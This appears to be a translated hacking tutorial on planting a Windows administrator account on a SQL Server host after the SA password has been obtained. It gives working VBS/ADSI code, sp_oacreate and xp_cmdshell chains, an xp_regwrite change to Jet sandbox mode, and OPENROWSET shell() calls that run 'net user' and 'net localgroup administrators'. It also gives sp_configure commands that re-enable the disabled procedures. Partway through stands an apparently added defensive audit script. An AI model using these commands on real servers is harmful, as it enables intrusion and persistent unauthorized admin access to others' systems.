How to add an administrator without using net commands

Source: Internet
Author: User

 

After obtaining the SA password, you often find that the server administrator, or a "predecessor" who got there first, has restricted the use of net.exe and net1.exe, so an administrator account cannot be added that way. VBS, through Active Directory Service Interfaces (ADSI), exposes a WinNT object for managing local resources, and it can add an administrator without relying on CMD commands such as net. The specific code is as follows:
Set wsnetwork = CreateObject("WSCRIPT.NETWORK")
os = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(os) ' Get the ADSI interface and bind
Set oe = GetObject(os & "/Administrators,group") ' Attribute: admin group
Set od = ob.Create("user", "test") ' Create a user
od.SetPassword "1234" ' Set the password
od.SetInfo ' Save
Set of = GetObject(os & "/test", user) ' Get the user
oe.Add os & "/test"
Save the code above as 1.vbs and then run the command "cscript 1.vbs". This adds a user named test with the password 1234 to the system. The code to execute in Query Analyzer is as follows:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set wsnetwork = CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'os = "WinNT://" & wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set ob = GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set oe = GetObject(os & "/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set od = ob.Create("user", "test")'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'Set of = GetObject(os & "/test", user)'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'oe.Add os & "/test"'
After the preceding statements have run, execute the following line on its own. Do not run it together with the preceding statements; otherwise the message "c:\1.vbs is being used by another program" is displayed and the user cannot be added:
exec master..xp_cmdshell 'cscript c:\1.vbs'
If the system user is not added successfully, it may be because the password 1234 is too simple and does not meet the server's password complexity policy. Consider a more complex password and test again. You can also use echo to write the code to 1.vbs. The format is:
exec master..xp_cmdshell 'echo set wsnetwork = CreateObject("WSCRIPT.NETWORK") > 1.vbs'
But I don't know why command lines containing the "&" character cannot be written into 1.vbs. If you are interested, try to solve it.

Using Jet sandbox mode gets around the trouble caused by stored procedures such as xp_cmdshell and their related dynamic link libraries. For security reasons, the sandbox mode is disabled by default, so xp_regwrite is needed to enable it:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1
Then run the sandbox command to add a user with the username test and password 1234 to the system:
select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test 1234 /add")')

select * from openrowset('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup administrators test /add")')
Different operating systems have different paths, which must be modified as needed:
NT/2K: c:\winnt\system32
XP/2003: c:\windows\system32
In addition, Microsoft SQL Server 2005 disables some stored procedures by default. They have to be enabled with the following commands:

Enable xp_cmdshell:
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Enable OPENROWSET:
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ad Hoc Distributed Queries', 1; RECONFIGURE;
Enable sp_oacreate:
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
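
From the defender's side, the three sp_configure options above and the Jet SandBoxMode registry value are the settings to audit on an instance. The T-SQL below is an added example, not part of the original article; it assumes SQL Server 2005 or later, a sysadmin login, and that the Jet 4.0 registry key is present on the host.

```sql
-- Added example (not from the original article): audit and turn off the
-- surface-area options that the techniques on this page depend on.
-- Assumes SQL Server 2005+ and a sysadmin login.

-- 1. Report the configured and running state of each option.
SELECT name,
       CAST(value AS int)        AS configured_value,
       CAST(value_in_use AS int) AS running_value,
       CASE WHEN CAST(value_in_use AS int) = 1
            THEN 'ENABLED - review'
            ELSE 'disabled'
       END                       AS status
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'Ad Hoc Distributed Queries')
ORDER BY name;

-- 2. Read the Jet SandBoxMode value that the article changes with
--    xp_regwrite. Values 2 and 3 keep unsafe expressions such as Shell()
--    blocked for non-Access hosts (SQL Server included); 0 and 1 do not.
EXEC master.dbo.xp_regread
     'HKEY_LOCAL_MACHINE',
     'SOFTWARE\Microsoft\Jet\4.0\Engines',
     'SandBoxMode';

-- 3. Switch the three options off and hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

A login with sysadmin rights can turn these options back on, as the commands above show, so the settings only hold while SA and other sysadmin logins are protected. Each sp_configure change is written to the SQL Server error log, which makes an unexpected flip of any of these options a useful alert.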
--------------------------------------------------------------------------------


Command lines containing the "&" character cannot be written to 1.vbs because the author's batch scripting is too poor to know this. Because & is a reserved word in bat, it cannot be ignored. If you want to use echo to write "&", you need to write it this way: echo ^& xxxx
